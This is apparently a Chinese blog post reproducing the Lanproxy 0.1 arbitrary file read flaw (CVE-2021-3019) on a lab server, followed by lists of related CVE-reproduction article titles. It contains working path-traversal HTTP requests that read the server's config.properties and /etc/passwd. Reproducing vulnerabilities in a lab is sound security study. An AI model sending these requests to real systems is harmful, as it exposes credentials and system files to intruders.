声明

好好学习,天天向上

漏洞描述

影响范围

复现过程

这里使用0.1版本

下载地址,复现只下载服务端版本即可,放在一个已经配置好java环境的linux的服务器中,proxy-server-0.1.zip

https://file.nioee.com/d/2e81550ebdbd416c933f/

执行

unzip proxy-server-0.1.zip
mv proxy-server-0.1 /usr/local/
vim /usr/local/proxy-server-0.1/conf/config.properties

看到了配置文件,不做修改

启动服务

cd /usr/local/proxy-server-0.1/bin
chmod +x startup.sh
./startup.sh

环境启动后,访问

http://192.168.31.64:8090/

BP抓包,修改为如下,可以看到刚刚的那个配置文件

GET /../conf/config.properties HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

查看passwd,如果第二次半天出不来,可重新抓个包修改

GET /../../../../../../etc/passwd HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Lanproxy任意文件读取漏洞复现(CVE-2021-3019)相关推荐

  1. Apache Solr任意文件读取漏洞复现

    Apache Solr任意文件读取漏洞复现 一.简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口.用户可以通过http请求,向搜索引擎服务器提交一定格 ...

  2. CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)

    CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一.漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Fir ...

  3. Grafana 任意文件读取漏洞复现

    一.漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 二.漏洞影响 Grafana 8.x 三.漏洞复现 可以从登陆页面看到版本信息为 v8.2. ...

  4. CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)

    漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在 ...

  5. GitLab任意文件读取漏洞复现(CVE-2020-10977)

    0x00简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务.GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git ...

  6. CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现

    目录 1. 简介 2. 影响范围 3. 环境搭建 3.1 安装Composer 4. 漏洞复现 4.1 列举目录 4.2 任意文件读取 1. 简介 ThinkAdmin 是基于 ThinkPHP后台开 ...

  7. GateOne CVE-2020-35736 任意文件读取漏洞复现

    0x00:简介 GateOne 是一款使用 HTML5 技术编写的网页版 SSH 终端模拟器.基于现代的 HTML5 技术,无需任何浏览器插件.支持多个 SSH 进程.可以嵌入到其他任意应用程序中.支 ...

  8. Grafana 未授权任意文件读取漏洞复现

    1.fofa 批量搜索 app="Grafana" 漏洞URL: {{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../. ...

  9. Gitlab 任意文件读取漏洞 CVE-2016-9086 漏洞复现

    Gitlab 任意文件读取漏洞(CVE-2016-9086) by ADummy 0x00利用路线 ​ 上传poc.tar.gz文件->读取到etc/passwd 0x01漏洞介绍 ​ 2018 ...

  10. CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞

    CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞 目录 漏洞原理 漏洞信息 受影响版本 FOFA搜集相关资产 漏洞分析&漏洞复现 解决方案 漏洞原理 Grafana是一 ...

最新文章

  1. c# 取两个时间的间隔
  2. MATLAB获取一个目录中的所有文件
  3. 提审马甲包被拒问题记录
  4. RMI中部署时要注意的地方
  5. offsetLeft 解析
  6. C# 9.0 新功能一览
  7. 招聘 | 大疆算法类未来大咖招聘
  8. PulseAudio VS AudioFlinger(七)
  9. 系统常用 Intent 合集
  10. html编写在线打字通,HTML5代码打字练习、HTML5案例 - 03
  11. 2毫秒c51汇编语言延时函数,单片机精确毫秒延时函数
  12. 《迅雷链精品课》第十课:共识算法理论基础
  13. 电子不停车收费系统(ETC)专题(5)——最新动态
  14. 哈希表_实现插入、删除、查找元素操作(链地址法解决冲突)
  15. 能力素质有所欠缺_学有所思,思有所悟,悟有所行
  16. mysql日期时间类型
  17. win10下面搜索框无法搜索应用的解决方案
  18. linux查看磁盘是否SSD盘
  19. 国内高校课程资源汇总 2019.3
  20. Js逆向案例—网易云音乐

热门文章

  1. 信息安全工程师(软考资料)
  2. 查成语--每天10行python代码系列!
  3. 沪深股票历史数据下载,股票历史交易数据下载
  4. 深信服SCSA认证知识点(2)
  5. win10如何禁用\删除讨厌的ff新鲜事(ff新推荐)(flash弹窗广告)
  6. 数字信号处理的fpga实现_数字信号处理的卷积运算实现
  7. CMS内容管理系统可行性分析
  8. 几何画板椭圆九种画法_如何利用几何画板自定义工具画椭圆
  9. 人工神经网络MATLAB例子,matlab人工神经网络模型
  10. JavaScript高级程序设计(第3版)中文在线阅读